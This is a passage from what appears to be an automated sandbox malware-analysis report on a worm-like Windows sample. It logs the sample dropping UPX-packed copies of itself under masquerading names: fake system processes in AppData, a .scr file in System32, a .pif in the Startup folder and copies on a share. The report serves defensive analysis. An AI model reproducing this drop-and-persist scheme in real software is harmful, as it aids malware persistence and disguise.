wrote 46870 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46869 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46777 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46786 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46769 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46807 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46955 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46909 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46801 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46901 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 46846 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\4K51K4\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46788 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46755 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47025 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46771 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46741 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46802 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46875 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46694 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46850 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46812 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46768 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46847 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46843 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46905 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46988 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46767 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46835 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46910 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46935 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46882 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46925 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46930 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46693 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46818 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46836 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46719 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46835 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46921 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46839 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46965 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46826 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46849 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46792 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46878 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46711 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46914 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46709 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46777 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46966 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46785 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46774 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46997 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46724 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46819 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46793 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46819 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46969 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46898 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46888 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46867 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46931 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C38A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9DE16.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9DF9D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C38C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9DF99.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9DE19.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has section name UPX1 with entropy \"7.85055163958\"\n \"services.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"4k51k4.exe.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"shell.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Empty.pif\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C38A.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE.bin\" has section name 